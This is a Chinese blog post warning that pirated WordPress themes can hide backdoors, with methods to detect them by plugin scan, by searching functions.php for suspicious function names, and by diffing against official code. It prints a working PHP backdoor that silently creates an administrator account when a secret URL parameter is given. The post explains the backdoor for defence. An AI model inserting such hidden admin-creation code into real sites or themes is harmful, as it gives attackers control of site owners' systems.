小心WordPress盗版主题里暗藏后门

最新推荐文章于 2023-05-19 08:50:34 发布
最新推荐文章于 2023-05-19 08:50:34 发布
阅读量774 收藏 3
点赞数 1
分类专栏: Wordpress 文章标签: wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChanYao/article/details/114013322
版权

下面给大家看看这个常见的后门代码

add_action( ‘wp_head’, ‘wp_backdoor’ );
function wp_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’
) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘123456’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}

由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为backdoor,密码为123456的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台获得管理员权限,也就是说,网站后台被拿到shell,后果你可以自己想象一下。

所以搜刮在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版。

哪如何检测Wordpress主题是否有后门呢?

第一种使用工具检测(插件检测)主题方法:

安装插件方法:

Wordpress后台——外观——TAC——启动Theme Authenticity Checker安全检测插件

然后就会自动检测,如果出现全部为绿色,则表示没有任何后门

如果有异常请点击Details产看,并按照路径进行相关处理

第二种使用手动检测主题方法:

使用ftp工具查看源码:找到fuctions.php这个文件

查看是否包含以下函数:

function __popular_posts

function stripos

function scandir

function _getprepare_widget

add_action(“init”, “_getprepare_widget”);

function _get_allwidgets_cont

function strripos

function _checkactive_widgets

add_action(“admin_head”, “_checkactive_widgets”);

第三种使用文件同步对比法检测主题方法:

首先在wordpress官网下载跟你源码相同版本的代码

找到下载源码中的fuctions.php与你的程序源码的fuctions.php进行对比

对比的时候请注意,如果对比出现红色的可以询问相关技术人员,或者在网上进行搜索

对比推荐使用软件Beyond Compare 4点击进行文本对比即可

ChanYao
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
气死了,好好的wordpress主题,被人植入了后门程序
06-22 690
最近一直在研究wordrpess主题,但不知道为什么,新建的网站浏览量很好,但是搜索内容几乎为零,我看了下大体的浏览方向,发现IP地址都在河南地区,我就奇怪了,什么人比我还用心,天天打开我网站看啊。 今天在检查代码的时候发现我的wordpss主题中被人插入了如下的代码: <?php function _verifyactivate_widgets(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FI
防范wordpress主题后门代码获取管理员权限
09-29
只需几行代码就可以为WordPress主题留下后门,大家要小心
什么是后门
w18842156489的博客
05-19 656
通常指那些绕过安全性控制而获取对程序或系统访问权的程序方法。 在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。
wordpress免费模板会不会留后门
xiaoyuya
09-29 200
后门是违法行为,wordpress主题制作者打死也不敢自己给自己做的wordpress主题留个后门,除非他想吃牢饭。 有些人的网站被黑了,首先会怀疑是不是自己下载的免费主题有问题,这么怀疑也正常。 但是,你得先问问自己的主题是在哪下载的,是不是来源可靠。 本站louyuwu.net提供的的均为精智wordpress主题http://www.jianzhanpress.com提供的免费主题,经过验证,来源可靠的才敢放上来了。 如果你是到一些,不知道来源的下载站,随便就下载了个wordpress..
资源宝分享wordpress主题后门检测清理技巧
云博客_资源宝分享
04-29 2047
资源宝分享wordpress主题后门检测清理技巧 更多文章查看资源宝博客:www.httple.net 但是对于wordpress漏洞并不是所有人都很了解,往往在网站运营过程中没能注意网站的安全。 网站的安全除了空间服务商本身的安全控制外,那就是网站程序本身的安全问题。那我们该如何保障网站自身的安全呢?下面就以我的资源宝博客为例,来说说wordpress网站的安全问题。话说wordpress类网站的安全主要从两方面来讲: 一、wordpress程序本身安全 wordpress本身就存在一些漏洞,所以
WordPress主题后门严重威胁网站安全
jinyeweiyang的专栏
12-13 886
WordPress是国内站长非常喜欢采用的一款建站应用软件,由于其具有非常丰富的模版和插件,具有良好的可扩展性。特别对于博客类网站,WordPress几乎成为建站首选。 在阿云安全团队的日常运营中,我们发现,WordPress一直是黑客攻击的主要目标。下图是阿云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿云云盾安全运营报告,http://security.ali
Ripro9.0免扩展二开版WordPress博客主题Ripro全解密无后门
10-13
RiPro9.0二开版本 完全解密修正版,无后门更放心!免扩展、虚拟主机就能用!且修正了原版的多处BUG,更好用!子主题有huzao-child主题和sheji-child子主题美化包,共两款。内置多个插件,均正常运行
亲测自用wordpress总裁主题4.3.0
03-12
总裁主题4.3.0,亲测自用wordpress主题 CeoMax主题是基于WordPress程序的主题,由CeoTheme总裁主题团队原创开发,使用主题你需要安装WordPress程序。 商城系统基于Erphpdown,主题已内置集成Erphpdown,总裁主题...
wordpress-Zibll子比主题-最新版本V5.7-免授权无后门
08-08
此次更新以优化为主,更新内容不多,主要是因为大多数精力都在进行论坛系统的开发,在这也就提前预告一下,论坛系统将会在下一版发布,主题的论坛系统仍保持漂亮的UI设计,同时功能强大,可以完美的实现圈子、问答...
WordPress主题Modownv8.1.2主题无密源码
10-13
不多说,WordPress主题Modownv8.1.2主题无密源码,完整开源 利于二次开发和子主题开发
盗版新手:德国盗版者的WordPress主题
02-25
盗贼 海盗派对的WordPress主题遍布全球 全球海盗聚会的主题。 此主题允许您在最常用的颜色组合(紫色和橙色)之间进行选择,作为设计元素的主要颜色。 它使用几个免费使用的海盗符号,并允许自定义CSS。 它是为德国海盗党创建的,以替代以前的wordpress主题主题导师 xwolf( ) 信息和下载 主题主页: : 下载: : 克隆: : 邮编: : 变更日志: : 学分 基于Elmastudio( )关于主题Uku的精彩作品的主题设计和一些功能。 底层框架:Bootstrap,AwesomeFont,jQuery
WordPress 简约主题 NDNAV 网址导航网站模版
08-30
NDNAV 主题是由暖岛站长(阿叶)开发的一款简约大气的昼夜 WordPress 免费导航主题,这款主题界面、功能都比较简洁。 这是一款定位简约的导航主题,这款WordPress导航主题没有太多花胡哨的功能,一定程度上保证了这...
wordpress主题
最新发布
12-13
自媒体一号主题,自动适应。
WordPress Avada主题V7.8.1 免授权版
02-25
WordPress Avada主题V7.8.1 免授权版
wordpress人文古风主题 v2.3
12-05
博闻广记wordpress古风主题模板版是基于html5+css3制作的,她是一款高端大气、古典优雅的主题,采用响应式设计,两栏布局,上中下构造,兼容IE8、9、10、11和各种现代浏览器。她在手机、平板、PC上都有不错的显示...
最新WordPress找回后台管理员密码(资源宝博客在此分享4种方法)
云博客_资源宝分享
04-29 1740
最新WordPress找回后台管理员密码(4种方法分享) 网站多了,或者长时间不用了,就容易忘记 WordPress 后台密码,这个时候你不要惊慌, WordPress 忘记后台密码后的解决办法,总有一款适合你的。 方法1:数据库修改方法(随着WP更新版,可能有点问题,不过先发出来) 登入phpMyAdmin后,先从左边选自己的数据库,然后点上面的 SQL 标签页,执行下面命令 (方法1): UPDATE `wp_users` SET `user_pass`='$P$BWZhQxx/R9UCBgECUh
最常用的WordPress后台提示信息:add_action函数大全
程序人生
01-06 703
最常用的WordPress后台提示信息:add_action函数大全,常常会用到一些后台提示信息,方便提醒使用者一些提示信息的,所以在不同的位置需要有更多的提示来加强后台的使用体验,这大挖总结整理了一些比较常用的后台信息提供函数,方便大家使用。只需要把上面的代码放入 functions.php 文件中即可,把相应插件换成你想要 WordPress 主题安装的插件,实现的效果如下。当你需要提示用户需安装某款插件来实现网站某些功能的时候,相信本篇文章将会帮助你。
黑客在数十个 WordPress 插件和主题中插入秘密后门,可发动供应链攻击
smellycat000的专栏
01-24 694
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
wordpress 黑客_如何在被黑客入侵的WordPress网站中找到后门并进行修复
cumohuo9136的博客
09-07 1657
wordpress 黑客Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site, and the hacker was able to ge...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值